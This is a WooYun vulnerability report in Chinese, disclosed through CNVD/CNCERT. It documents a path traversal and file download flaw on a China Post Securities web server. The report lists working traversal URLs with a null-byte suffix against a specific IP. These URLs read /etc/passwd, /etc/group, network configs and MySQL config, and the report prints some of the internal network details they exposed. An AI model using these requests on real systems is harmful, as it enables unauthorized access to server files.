当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
中邮证券某站系统文件遍历与下载
相关厂商:
漏洞作者:
提交时间:
2013-10-09 16:38
修复时间:
2013-11-23 16:39
公开时间:
2013-11-23 16:39
漏洞类型:
任意文件遍历/下载
危害等级:
自评Rank:
11
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2013-10-09: 细节已通知厂商并且等待厂商处理中
2013-10-13: 厂商已经确认,细节仅向厂商公开
2013-10-23: 细节向核心白帽子及相关领域专家公开
2013-11-02: 细节向普通白帽子公开
2013-11-12: 细节向实习白帽子公开
2013-11-23: 细节向公众公开

简要描述:

中邮证券某站系统文件遍历与下载

详细说明:

问题站点:
http://103.22.252.251/
是手机网站还是什么原因,网站做的真不咋地,但可以看出是中邮证券的:

1-1.PNG


遍历页面及参数
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/*%00.jpg
一、passwd文件,看看有哪些用户
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg

1-2.PNG


二、版本的linux
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../proc/version%00.jpg

1-3.PNG


很奇怪的版本,小菜没用过
三、网络信息
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.jpg
eth0如下:
DEVICE=eth0
USERCTL=no
ONBOOT=yes
MASTER=bond0
SLAVE=yes
BOOTPROTO=none
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1%00.jpg
eth1如下:
DEVICE=eth1
USERCTL=no
ONBOOT=yes
MASTER=bond0
SLAVE=yes
BOOTPROTO=none
可以看到用了bond0,双网卡绑定,果断看bond0:
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-bond0%00.jpg
内容如下:
DEVICE=bond0
IPADDR=18.1.7.129
NETMASK=255.255.255.192
ONBOOT=yes
BOOTPROTO=none
USERCTL=no
四、服务信息
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/services%00.jpg

1-4.PNG


五、看到装了mysql
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/my.cnf%00.jpg
默认配置

1-5.PNG


六、hosts文件
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/hosts%00.jpg

1-6.PNG


怪不得有这问题,原来用了同花顺,他们从不补漏洞的。
据说是优化TCP\IP协议的文件
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysctl.conf%00.jpg

1-7.PNG


七、标准化界面的管理和操作用户和组账号的库
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/libuser.conf%00.jpg

1-8.PNG

漏洞证明:

用户组:
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/group%00.jpg

1-9.PNG

修复方案:

让同花顺解决

版权声明:转载请注明来源 霍大然@乌云


>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-10-13 21:21

厂商回复:

CNVD确认并复现所述情部我,已经转由CNCERT通报证券行业信息化主管部门,由其通报涉事单位处置。
rank 10

最新状态:

暂无